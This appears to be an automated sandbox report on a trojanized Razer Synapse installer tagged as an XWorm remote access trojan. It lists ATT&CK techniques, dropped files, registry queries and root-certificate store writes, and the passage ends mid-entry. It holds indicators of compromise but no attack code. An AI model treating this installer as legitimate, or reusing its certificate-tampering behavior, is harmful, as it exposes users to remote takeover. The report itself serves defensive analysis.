Malware Analysis Report

2024-09-11 14:51

Sample ID 240609-rred1acb73
Target RazerSynapseInstaller_v1.17.0.60.exe
SHA256 86fc45a637f30313b5af7d6264b1db58affa024daba9a7eb1aac18b4300b906a
Tags
execution xworm rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

86fc45a637f30313b5af7d6264b1db58affa024daba9a7eb1aac18b4300b906a

Threat Level: Known bad

The file RazerSynapseInstaller_v1.17.0.60.exe was found to be: Known bad.

Malicious Activity Summary

execution xworm rat trojan

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Enumerates connected drives

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-09 14:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-09 14:25

Reported

2024-06-09 14:28

Platform

win7-20240215-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\Razer\Installer\App\ja-JP\Razer.RazerInstallerCommon.resources.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processenvironment-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-math-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-process-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\ko-KR\Razer.RazerInstallerCommon.resources.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\d0358afcc6db81c332b1bd7a74cea311_1531214683a2MQHAbeGameBooster.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\systems.json C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-timezone-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\rzS3detmgr.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\[email protected] C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-util-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-time-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\BLEConnectWrapper.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\Razer.DetectManagerWrapper.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\de-DE\ C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\d5ca164e824fabfbcdb060c913bdef2e_cortex-white.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processthreads-l1-1-1.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-multibyte-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-time-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\BLEConnectWrapper.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\vcruntime140.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\[email protected] C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\a6a8ab87779f3b131679289a63f21a91_LWI-Alisha3.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\c6ca05c84ba361f9c119d64e0e42f2b3_dark_chroma_studio.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-debug-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-rtlsupport-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-locale-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\dummyProt.json C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-timezone-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\PatchExceptionalEID.json C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\05b34d432336dbcf6ea0764da372603d_light_macros.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-filesystem-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\de-DE\Razer.RazerInstallerCommon.resources.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\es-ES\Razer.RazerInstallerCommon.resources.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\ru-RU\Razer.RazerInstallerCommon.resources.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-console-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-datetime-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-private-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\dongleV2.json.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-runtime-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\Razer.RazerInstallerCommon.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\AllSystems.json C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\PatchExceptionalEID.json C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\AllSystems.json C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-localization-l1-2-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-convert-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-runtime-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\4e9512ed0ddf959ad181958f4533bca2_audio_visualizer.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\fr-FR\Razer.RazerInstallerCommon.resources.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\pt-BR\Razer.RazerInstallerCommon.resources.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\ru-RU\ C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-console-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\dummyProt.json.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\rzS3detmgr.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\3140d624792d0f04d02efffcc88ea3ab_dark_synapse.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l1-2-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-utility-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\concrt140.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\rzS3detgmr_CWrapper.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-stdio-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\NLog.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\AWSSDK.Core.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 